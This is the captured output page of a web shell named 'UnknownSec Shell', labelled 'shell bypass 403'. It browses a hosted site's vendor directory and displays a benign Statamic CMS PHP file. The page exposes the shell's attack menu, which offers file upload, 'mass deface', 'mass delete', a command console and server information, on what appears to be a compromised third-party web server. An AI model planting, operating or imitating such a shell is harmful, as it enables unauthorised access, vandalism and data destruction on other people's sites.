shell bypass 403
UnknownSec Shell
:
/
home
/
forge
/
lolas.brannanatkinson.com
/
vendor
/
statamic
/
cms
/
src
/
Stache
/
Indexes
/
Terms
/ [
drwxrwxr-x
]
upload
mass deface
mass delete
console
info server
name :
Value.php
<?php namespace Statamic\Stache\Indexes\Terms; use Statamic\Facades\Term; use Statamic\Stache\Indexes\Value as Index; class Value extends Index { public function getItems() { $associatedItems = $this->store->index('associations')->items() ->mapWithKeys(function ($association) { $term = Term::make($value = $association['slug']) ->taxonomy($this->store->childKey()) ->set('title', $value) ->in($association['site']); return [$term->locale().'::'.$term->slug() => $this->getItemValue($term)]; }); return $associatedItems ->merge(parent::getItems()) ->all(); } }
© 2026 UnknownSec